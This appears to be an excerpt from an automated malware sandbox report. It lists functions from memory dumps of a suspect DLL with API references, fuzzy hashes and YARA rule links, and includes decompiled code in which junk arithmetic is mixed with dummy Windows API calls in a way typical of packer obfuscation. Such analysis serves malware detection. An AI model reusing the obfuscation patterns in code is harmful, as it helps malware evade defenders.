    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4E1C50, Relevance: 19.7, APIs: 13, Instructions: 172COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: _strncmp
    • String ID:
    • API String ID: 909875538-0
    • Opcode ID: 2256bfb21d839826948cc80ee376417e6d47cb8e699ffab64426ef2bc53d30dc
    • Instruction ID: 43647b523227b957b6f71ea4298f1eafedd7fdbe81cd4de9424022bad3ee6ff5
    • Opcode Fuzzy Hash: 2256bfb21d839826948cc80ee376417e6d47cb8e699ffab64426ef2bc53d30dc
    • Instruction Fuzzy Hash: A44106B3B85D1122C1906BBAAC02F87A755BBA035BF058537FA05DAB45E721942DC3E0
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4EB2CB, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 57COMMON
    Download Yara Rule
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6E506830,0000000C,6E4EB406,00000000,00000000,?,6E4E8B9D,?,6E5085E0,?,?), ref: 6E4EB2DD
    • __crt_waiting_on_module_handle.LIBCMT ref: 6E4EB2E8
      • Part of subcall function 6E4ED6F0: Sleep.KERNEL32(000003E8,6E51A490,?,6E4EB22E,KERNEL32.DLL,?,6E4ED3C9,?,6E4E850D,6E4E8B9D,?,?,6E4E8B9D,?,6E5085E0), ref: 6E4ED6FC
      • Part of subcall function 6E4ED6F0: GetModuleHandleW.KERNEL32(6E4E8B9D,?,6E4EB22E,KERNEL32.DLL,?,6E4ED3C9,?,6E4E850D,6E4E8B9D,?,?,6E4E8B9D,?,6E5085E0,?,?), ref: 6E4ED705
    • __lock.LIBCMT ref: 6E4EB343
    • InterlockedIncrement.KERNEL32(F08B0000), ref: 6E4EB350
    • __lock.LIBCMT ref: 6E4EB364
    • ___addlocaleref.LIBCMT ref: 6E4EB382
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
    • String ID: (FPn$KERNEL32.DLL
    • API String ID: 4021795732-620075342
    • Opcode ID: 952b722fa0edd3ced936c9fb68a5a592fe122c5b9d62da7ab4cf6a6860bc9e19
    • Instruction ID: 1388ef50c4230d8ed6cb2a15fbefbe8b6346626c28ad77ef61ddf812a1e689ac
    • Opcode Fuzzy Hash: 952b722fa0edd3ced936c9fb68a5a592fe122c5b9d62da7ab4cf6a6860bc9e19
    • Instruction Fuzzy Hash: 8C11AF71800B01EED7609FB5D801F8ABBF4AF41329F20891EE49997B90CB74A941CF95
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4E8BE3, Relevance: 10.6, APIs: 7, Instructions: 77COMMON
    Download Yara Rule
    APIs
    • __decode_pointer.LIBCMT ref: 6E4E8C02
      • Part of subcall function 6E4EB1DF: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6E4ED3C9,?,6E4E850D,6E4E8B9D,?,?,6E4E8B9D,?,6E5085E0,?,?), ref: 6E4EB21E
      • Part of subcall function 6E4EB1DF: __crt_waiting_on_module_handle.LIBCMT ref: 6E4EB229
      • Part of subcall function 6E4EB1DF: GetProcAddress.KERNEL32(00000000,6E5044D0), ref: 6E4EB239
    • __msize.LIBCMT ref: 6E4E8C20
    • __realloc_crt.LIBCMT ref: 6E4E8C44
    • __realloc_crt.LIBCMT ref: 6E4E8C5A
    • __encode_pointer.LIBCMT ref: 6E4E8C6C
    • __encode_pointer.LIBCMT ref: 6E4E8C7A
    • __encode_pointer.LIBCMT ref: 6E4E8C85
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: __encode_pointer$__realloc_crt$AddressHandleModuleProc__crt_waiting_on_module_handle__decode_pointer__msize
    • String ID:
    • API String ID: 1302542147-0
    • Opcode ID: 532ffcd40000ac6c988ef5240bc0728bd686350c4ffe9c0348f0b6f5ca3f6c73
    • Instruction ID: e8c55e51c9c32973e91d66ae8c4d57b080c0a3c23073b775bcbfc09d4b86cc5f
    • Opcode Fuzzy Hash: 532ffcd40000ac6c988ef5240bc0728bd686350c4ffe9c0348f0b6f5ca3f6c73
    • Instruction Fuzzy Hash: 34113A72200301DEAB205FB4DC82CD977A9DA4A2E6328483FE404E6D58EF20DD408780
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4EDD63, Relevance: 9.0, APIs: 6, Instructions: 49COMMON
    Download Yara Rule
    APIs
    • __CreateFrameInfo.LIBCMT ref: 6E4EDD8B
      • Part of subcall function 6E4E8A00: __getptd.LIBCMT ref: 6E4E8A0E
      • Part of subcall function 6E4E8A00: __getptd.LIBCMT ref: 6E4E8A1C
    • __getptd.LIBCMT ref: 6E4EDD95
      • Part of subcall function 6E4EB42B: __getptd_noexit.LIBCMT ref: 6E4EB42E
      • Part of subcall function 6E4EB42B: __amsg_exit.LIBCMT ref: 6E4EB43B
    • __getptd.LIBCMT ref: 6E4EDDA3
    • __getptd.LIBCMT ref: 6E4EDDB1
    • __getptd.LIBCMT ref: 6E4EDDBC
    • _CallCatchBlock2.LIBCMT ref: 6E4EDDE2
      • Part of subcall function 6E4E8AA5: __CallSettingFrame@12.LIBCMT ref: 6E4E8AF1
      • Part of subcall function 6E4EDE89: __getptd.LIBCMT ref: 6E4EDE98
      • Part of subcall function 6E4EDE89: __getptd.LIBCMT ref: 6E4EDEA6
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
    • String ID:
    • API String ID: 1602911419-0
    • Opcode ID: eb468c4697405e42c6457a59a6a4db705e21c0e7bf8ef36406ca14a8090f7836
    • Instruction ID: 4b1841635963b5faf43a983e692b94f918259b0dca3f3220d56d9eae3936b6ce
    • Opcode Fuzzy Hash: eb468c4697405e42c6457a59a6a4db705e21c0e7bf8ef36406ca14a8090f7836
    • Instruction Fuzzy Hash: 5511B471C00309DFDB00DFF5D844AED7BB8BF08315F1488AAE954A7650DB799A159F90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4E7123, Relevance: 7.6, APIs: 5, Instructions: 96COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: DuplicateErrorHandleLast__alloc_osfhnd__dosmaperr__set_osfhnd
    • String ID:
    • API String ID: 3341121645-0
    • Opcode ID: 7bf5575a031e9ff2d84cbb00679e13d94cf5c2fb17954047c8f8c309e9254ce7
    • Instruction ID: 731883b19e4e21c44173e3af47aefd06c6ee362b0f1556ad58d8877ff91c3224
    • Opcode Fuzzy Hash: 7bf5575a031e9ff2d84cbb00679e13d94cf5c2fb17954047c8f8c309e9254ce7
    • Instruction Fuzzy Hash: 0C3114314086558FCF01DFF8C894EDDBBB5AF8A326B18068AE450AB7D2D771E905CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4EC6BB, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
    Download Yara Rule
    APIs
    • __getptd.LIBCMT ref: 6E4EC6C7
      • Part of subcall function 6E4EB42B: __getptd_noexit.LIBCMT ref: 6E4EB42E
      • Part of subcall function 6E4EB42B: __amsg_exit.LIBCMT ref: 6E4EB43B
    • __amsg_exit.LIBCMT ref: 6E4EC6E7
    • __lock.LIBCMT ref: 6E4EC6F7
    • InterlockedDecrement.KERNEL32(?), ref: 6E4EC714
    • InterlockedIncrement.KERNEL32(6E508E28), ref: 6E4EC73F
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
    • String ID:
    • API String ID: 4271482742-0
    • Opcode ID: 23fa74e23e607e9b6838d01ad0ed950d1170a57fe9b4121144ad0142aee9f9d4
    • Instruction ID: c7505791507c36fa0fc94ac67dc781a8370ca6ce39ef384e2292fd532ac6d12b
    • Opcode Fuzzy Hash: 23fa74e23e607e9b6838d01ad0ed950d1170a57fe9b4121144ad0142aee9f9d4
    • Instruction Fuzzy Hash: 3B015B72900B629BDA51AFF59444FCE7BA4AF49726F11400BE810ABB80CB746941CFD6
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4E75EF, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
    Download Yara Rule
    APIs
    • __lock.LIBCMT ref: 6E4E760D
      • Part of subcall function 6E4EB99E: __mtinitlocknum.LIBCMT ref: 6E4EB9B4
      • Part of subcall function 6E4EB99E: __amsg_exit.LIBCMT ref: 6E4EB9C0
      • Part of subcall function 6E4EB99E: RtlEnterCriticalSection.NTDLL(?), ref: 6E4EB9C8
    • ___sbh_find_block.LIBCMT ref: 6E4E7618
    • ___sbh_free_block.LIBCMT ref: 6E4E7627
    • HeapFree.KERNEL32(00000000,6E4E8B9D,6E506698,0000000C,6E4EB97F,00000000,6E506880,0000000C,6E4EB9B9,6E4E8B9D,?,?,6E4F1E8C,00000004,6E506B60,0000000C), ref: 6E4E7657
    • GetLastError.KERNEL32(?,6E4F1E8C,00000004,6E506B60,0000000C,6E4EEA6A,6E4E8B9D,?,00000000,00000000,00000000,?,6E4EB3DD,00000001,00000214), ref: 6E4E7668
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
    • String ID:
    • API String ID: 2714421763-0
    • Opcode ID: 38fb1f534d8e6e59d95234026ca286e00c99a3a28acb2aff8fb5aaa83e65a956
    • Instruction ID: eca0d9b158473ed273b4994e305d9c5115f7598fc3fcd1533714ef72749653a0
    • Opcode Fuzzy Hash: 38fb1f534d8e6e59d95234026ca286e00c99a3a28acb2aff8fb5aaa83e65a956
    • Instruction Fuzzy Hash: E4018F31849705AADF606BF49808FCD3A68AF4177AF14491FE500AA9C5DB3994408AD4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4B2A90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96registryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4B2A90(char _a4) {
				signed int _v13;
				signed int _v20;
				signed char _v21;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				WNDCLASSA* _v40;
				signed int _v44;
				signed int _v48;
				RECT* _t41;
				signed int _t44;
				int _t45;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				WNDCLASSA* _t56;
				signed char _t57;
				signed int _t59;
				signed char _t60;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				struct HWND__* _t70;
				char* _t74;
				signed int _t76;
				WNDCLASSA* _t78;
				signed int _t79;
				signed char _t82;
				signed int _t83;
				signed int _t84;
				void* _t85;

				_t1 =  &_a4; // 0x6e4b6ae1
				_t85 =  *_t1;
				_t41 = _t85 & 0x00000002;
				_v28 = _t41;
				_t70 = _t41 ^ _t85;
				_v20 = _t70;
				_v13 = _t70 * 0xffffffae;
				InvalidateRect(_t70, _t41, _t70);
				_t44 = _v13 + _v20;
				_v20 = _t44;
				_v13 =  ~(_t44 << 2);
				if(_t85 != _t44 && _t85 != _v20 && _t85 != _v28) {
					_t66 = (_v13 & _t85) - _t85;
					_v13 = _t66;
					_t67 = _t66;
					_v20 = _t67;
					_v32 = _t67 - _t85;
				}
				_t45 = _v20;
				_t74 = _t45 + 0x23;
				_v32 = _t74;
				RegEnumValueW(_t85, _t45, _t85, _t85, _t45, _v28, _t74, _t45);
				_t47 = _v32;
				_t76 = _t85 + _t47 | _t85;
				_v36 = _t76;
				_t82 = _v13 & _t76;
				_v13 = _t82;
				_t78 = _t82 * _v28;
				_v40 = _t78;
				_t48 = _t47 * _t78;
				_v44 = _t48;
				_t49 = _t48 & _v20;
				_v21 = _t49;
				_v20 = _t78 + _t49;
				RegisterClassA(_t78);
				_t79 = _v20;
				_t56 = _t79 * _t85 + _v36;
				_v40 = _t56;
				_t83 = _v28;
				_t57 = _t56 + _t83;
				_v13 = _t57;
				_t84 = _t57;
				_v48 = _t84;
				_t59 = _t84 - _t83;
				_v36 = _t59;
				_t60 = _t85 + _t59;
				_v21 = _t60;
				_t62 = _t60 * _t84;
				_v28 = _t62;
				_t63 = _t62 * _t79;
				_v20 = _t63;
				return _t63;
			}



































    0x6e4b2a98
    0x6e4b2a98
    0x6e4b2a9d
    0x6e4b2aa0
    0x6e4b2aa5
    0x6e4b2aa7
    0x6e4b2aad
    0x6e4b2ab3
    0x6e4b2abd
    0x6e4b2ac0
    0x6e4b2aca
    0x6e4b2acf
    0x6e4b2ae1
    0x6e4b2ae3
    0x6e4b2ae6
    0x6e4b2ae9
    0x6e4b2aee
    0x6e4b2aee
    0x6e4b2af1
    0x6e4b2af4
    0x6e4b2af7
    0x6e4b2b04
    0x6e4b2b0a
    0x6e4b2b10
    0x6e4b2b12
    0x6e4b2b19
    0x6e4b2b1b
    0x6e4b2b21
    0x6e4b2b25
    0x6e4b2b28
    0x6e4b2b2b
    0x6e4b2b2e
    0x6e4b2b31
    0x6e4b2b39
    0x6e4b2b3d
    0x6e4b2b43
    0x6e4b2b4e
    0x6e4b2b51
    0x6e4b2b54
    0x6e4b2b57
    0x6e4b2b59
    0x6e4b2b5c
    0x6e4b2b5f
    0x6e4b2b64
    0x6e4b2b66
    0x6e4b2b69
    0x6e4b2b6b
    0x6e4b2b71
    0x6e4b2b74
    0x6e4b2b77
    0x6e4b2b7a
    0x6e4b2b83

    APIs
    • InvalidateRect.USER32(jKn,jKn,jKn,?,?,?,?,?,?,?,6E4B6AE1,?), ref: 6E4B2AB3
    • RegEnumValueW.ADVAPI32(jKn,?,jKn,jKn,?,?,?,?,?,?,?,?,?,?,?,6E4B6AE1), ref: 6E4B2B04
    • RegisterClassA.USER32 ref: 6E4B2B3D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ClassEnumInvalidateRectRegisterValue
    • String ID: jKn
    • API String ID: 4098621799-3617101073
    • Opcode ID: c5507035e9d763e969d46bc7f1bcdcf9e715d84eae0b5368cce25156a001ea5a
    • Instruction ID: b1eb06d9b21015742ab9c7e60cbf52faed7455fd075e86f1db9118ce22fba44b
    • Opcode Fuzzy Hash: c5507035e9d763e969d46bc7f1bcdcf9e715d84eae0b5368cce25156a001ea5a
    • Instruction Fuzzy Hash: 07312A71E0466A9FCF08DFA8C8965FEFFF9AE49200B04415BE454E3341E6789645CBE4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4E8B7E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
    Download Yara Rule
    APIs
    • _malloc.LIBCMT ref: 6E4E8B98
      • Part of subcall function 6E4E8454: __FF_MSGBANNER.LIBCMT ref: 6E4E8477
      • Part of subcall function 6E4E8454: __NMSG_WRITE.LIBCMT ref: 6E4E847E
    • std::bad_alloc::bad_alloc.LIBCMT ref: 6E4E8BBB
      • Part of subcall function 6E4E8B14: std::exception::exception.LIBCMT ref: 6E4E8B20
    • std::bad_exception::bad_exception.LIBCMT ref: 6E4E8BCF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: _mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
    • String ID: P]
    • API String ID: 2897411638-3263726251
    • Opcode ID: c088ca590b57fbc07cc734ae27c377400ae2975bc85b2343e64d945541c5d9ec
    • Instruction ID: 171b8bda3af5aa38d2b0fdcfe033c0150d15de131599e54e28bee931690badb3
    • Opcode Fuzzy Hash: c088ca590b57fbc07cc734ae27c377400ae2975bc85b2343e64d945541c5d9ec
    • Instruction Fuzzy Hash: 1AF027B48042096EDF4597F0D805DCD3BAC4F4525DB19085FF81069D82DF30890A82D1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4E5060, Relevance: 6.3, APIs: 4, Instructions: 282COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: _realloc
    • String ID:
    • API String ID: 1750794848-0
    • Opcode ID: 763a65b3e9a6a89bc06fadb278f6555b4bf3f50c16883fdd1ae6636f7e1700c5
    • Instruction ID: 63f68cb523ab7dc8ec6b37014593908cb218b918e66564b14f0215e2312f6f93
    • Opcode Fuzzy Hash: 763a65b3e9a6a89bc06fadb278f6555b4bf3f50c16883fdd1ae6636f7e1700c5
    • Instruction Fuzzy Hash: 5DB19CB0A087059FC354CFB9C880A5ABBF1FF49305F444A6EE48987B51E734E949CB96
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4E4060, Relevance: 6.2, APIs: 4, Instructions: 176COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: _realloc
    • String ID:
    • API String ID: 1750794848-0
    • Opcode ID: 7e6b05da01ded5eeb0f18a479d5990df2a24bcd5fcce013a8a6a7b911c0e889e
    • Instruction ID: 71280094ff8a7a105397bb7f616c173dfa3929b1c70830a82a5cecbea6d6dbc2
    • Opcode Fuzzy Hash: 7e6b05da01ded5eeb0f18a479d5990df2a24bcd5fcce013a8a6a7b911c0e889e
    • Instruction Fuzzy Hash: CB71E3B1A04B018FC360CF6AC480A56F7F5FF99351B518A2ED48A87A51E770F946CF90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4F2059, Relevance: 6.1, APIs: 4, Instructions: 103COMMON
    Download Yara Rule
    APIs
    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E4F208D
    • __isleadbyte_l.LIBCMT ref: 6E4F20C1
    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6E4F20F2
    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6E4F2160
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
    • String ID:
    • API String ID: 3058430110-0
    • Opcode ID: baabef10164ac9928e961ab8cbb44e912bfcd3c10b2c67ed747c366188067a77
    • Instruction ID: f37d938f04645bfe1d890c79fdababca38318c17018ccf455f05199025d0bdd2
    • Opcode Fuzzy Hash: baabef10164ac9928e961ab8cbb44e912bfcd3c10b2c67ed747c366188067a77
    • Instruction Fuzzy Hash: B531C232A04297EFDB00DFF4C854EAE7BB5FF81711B04856AE6608B291DB31D942CB59
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4EABE7, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
    • String ID:
    • API String ID: 3016257755-0
    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
    • Instruction ID: 02569248587a1bf947a41fee97560cd8437c7002c17b3bc07bfce7d92455c55b
    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
    • Instruction Fuzzy Hash: BF116D3204014ABBCF124EE4CC52CEE3F76BF59256B058856FA6858920C336C5B2BB81
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4ECE27, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
    Download Yara Rule
    APIs
    • __getptd.LIBCMT ref: 6E4ECE33
      • Part of subcall function 6E4EB42B: __getptd_noexit.LIBCMT ref: 6E4EB42E
      • Part of subcall function 6E4EB42B: __amsg_exit.LIBCMT ref: 6E4EB43B
    • __getptd.LIBCMT ref: 6E4ECE4A
    • __amsg_exit.LIBCMT ref: 6E4ECE58
    • __lock.LIBCMT ref: 6E4ECE68
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
    • String ID:
    • API String ID: 3521780317-0
    • Opcode ID: c7c6bf583dcfd1989ceebda2e948495f5e1dff52b7405bdc3635620e2b371794
    • Instruction ID: 3a8d15ab46cc2b5573b7c27e641d534e57d5a4cfae2a53ab85ef09bc81d4cd81
    • Opcode Fuzzy Hash: c7c6bf583dcfd1989ceebda2e948495f5e1dff52b7405bdc3635620e2b371794
    • Instruction Fuzzy Hash: 7BF09032A10B00CAD760EFF98401FCD7BE86F40726F02495FD540ABAC0CB74A901DAD1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4B4B20, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76filewindowCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4B4B20(BITMAPINFO* _a4, char _a8) {
				signed int _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t44;
				signed int _t45;
				signed int _t47;
				signed int _t54;
				signed int _t59;
				signed int _t61;
				signed int _t66;
				void* _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				BITMAPINFO* _t76;

				_t1 =  &_a8; // 0x6e4b665f
				_t75 =  *_t1;
				_t76 = _a4;
				_t44 = _t75 | 0x00000020;
				_t66 = _t44 + _t75;
				_v24 = _t66;
				_t45 = _t44 * _t66;
				_v20 = _t45;
				_t47 = _t45 + 0x000002d6 & 0x00000010;
				_v13 = _t47;
				_v32 = _t47 - _t75;
				if(_t75 == 0x7d0e2e2c && _t76 == _v24) {
					_t61 = _v32 & _v24;
					_v24 = _t61;
					_v13 = _v13 & 0x000000ff ^ _t61;
					CopyMetaFileA(_v20, _v20);
					_v28 = _v13 & _t76;
				}
				if(_t75 == _v13 && _t76 != _v20 && _t75 == _t76) {
					_t59 = _v28;
					_t70 = _t59 + _t75 + _t76 ^ _t76;
					_v24 = _t70;
					_t71 = _v20 + _t70;
					_v32 = _t71;
					_v36 = _t71 - _t59;
				}
				_v28 = _v36 * _v28;
				CreateDIBitmap(_v20, _v24, _v20, _v32, _t76, _t76);
				_t54 = _v28;
				_t67 = _t54 + _t75;
				_v28 = _t54 + _t75 + 0x34f;
				_v24 = _t76 + _t67 + 0x34f;
				_v20 = _t76 + _t67 + 0x469;
				return _v20;
			}





















    0x6e4b4b28
    0x6e4b4b28
    0x6e4b4b2b
    0x6e4b4b30
    0x6e4b4b33
    0x6e4b4b36
    0x6e4b4b39
    0x6e4b4b3c
    0x6e4b4b44
    0x6e4b4b47
    0x6e4b4b4c
    0x6e4b4b55
    0x6e4b4b5f
    0x6e4b4b62
    0x6e4b4b6b
    0x6e4b4b73
    0x6e4b4b7f
    0x6e4b4b7f
    0x6e4b4b88
    0x6e4b4b93
    0x6e4b4b9b
    0x6e4b4b9d
    0x6e4b4ba0
    0x6e4b4ba3
    0x6e4b4ba8
    0x6e4b4ba8
    0x6e4b4bb2
    0x6e4b4bc2
    0x6e4b4bc8
    0x6e4b4bcb
    0x6e4b4bd5
    0x6e4b4bdf
    0x6e4b4be9
    0x6e4b4bf5

    APIs
    • CopyMetaFileA.GDI32(?,?,?,6E4BF1F5,?,6E4B665F,?,?,?,?,?,?,?,?,?,6E4BF1F5), ref: 6E4B4B73
    • CreateDIBitmap.GDI32(?,6E4BF1F5,?,?,?,?), ref: 6E4B4BC2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: BitmapCopyCreateFileMeta
    • String ID: _fKn
    • API String ID: 1644440266-1207414251
    • Opcode ID: 0557c86ad0fa4477ea6957612acb4df1edaeb93d6d8e1fc5d3db081b40eda8f4
    • Instruction ID: 2a7261bf38c6571fcb6af175201619025cc0f8071d735eca036176e142e0714b
    • Opcode Fuzzy Hash: 0557c86ad0fa4477ea6957612acb4df1edaeb93d6d8e1fc5d3db081b40eda8f4
    • Instruction Fuzzy Hash: 9C31E972E0411A9FCF15DFA8C885AEEFBF8FF49250F05046AD655E7201E634A601CBE1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4EDAF4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: CallFrame@12Setting__getptd
    • String ID: j
    • API String ID: 3454690891-2137352139
    • Opcode ID: f5aa8b582035c679ceeea611f6396e06f301498e7134634ce9add663ef154c92
    • Instruction ID: 9459610015455f7db2658c92938f7dcfb3c5c1466b703c8d9179e49b8beb1a86
    • Opcode Fuzzy Hash: f5aa8b582035c679ceeea611f6396e06f301498e7134634ce9add663ef154c92
    • Instruction Fuzzy Hash: B6119A31900295DFDB01CFB4C484B9CBBB4AF4631AF08858BC4A42BA92D3B56942CF81
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4EE110, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
    Download Yara Rule
    APIs
    • ___BuildCatchObject.LIBCMT ref: 6E4EE123
      • Part of subcall function 6E4EE07E: ___BuildCatchObjectHelper.LIBCMT ref: 6E4EE0B4
    • _UnwindNestedFrames.LIBCMT ref: 6E4EE13A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: BuildCatchObject$FramesHelperNestedUnwind
    • String ID: csm
    • API String ID: 3487967840-1018135373
    • Opcode ID: 525528ab6db260b62be6e8d7665979427e9f478acbd5cb83dbeda6d0a9fd729f
    • Instruction ID: 3dab6a1ecc867657acb6c800fa3b53caccba34f175a298f72326d9b66561e314
    • Opcode Fuzzy Hash: 525528ab6db260b62be6e8d7665979427e9f478acbd5cb83dbeda6d0a9fd729f
    • Instruction Fuzzy Hash: 21014B31001109BBDF025FA1CC80EEBBF6AEF09356F004416FD5815920D772A5B1DBE1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4EDE89, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
    Download Yara Rule
    APIs
    • __getptd.LIBCMT ref: 6E4EDE98
      • Part of subcall function 6E4EB42B: __getptd_noexit.LIBCMT ref: 6E4EB42E
      • Part of subcall function 6E4EB42B: __amsg_exit.LIBCMT ref: 6E4EB43B
    • __getptd.LIBCMT ref: 6E4EDEA6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: __getptd$__amsg_exit__getptd_noexit
    • String ID: csm
    • API String ID: 803148776-1018135373
    • Opcode ID: fa0aa78ec2824e6826c1a6ec99e363653e763366db769acccabf9b01618c6013
    • Instruction ID: 6446875167504e1c6c8cbd4ee59a5fc30a8236ac9f217eeb3dcc4463ff834259
    • Opcode Fuzzy Hash: fa0aa78ec2824e6826c1a6ec99e363653e763366db769acccabf9b01618c6013
    • Instruction Fuzzy Hash: 7E014B34801B069BCB688FB9D444EADB3B9AF64216F15582FD05166FA4CB30A981DF81
    Uniqueness

    Uniqueness Score: -1.00%

    Analysis Process: msiexec.exe PID: 6344 Parent PID: 5348 msiexec.exeCOMMON

    Executed Functions

    Function 008215D0, Relevance: 3.2, APIs: 2, Instructions: 182fileCOMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E008215D0(void* __eflags) {
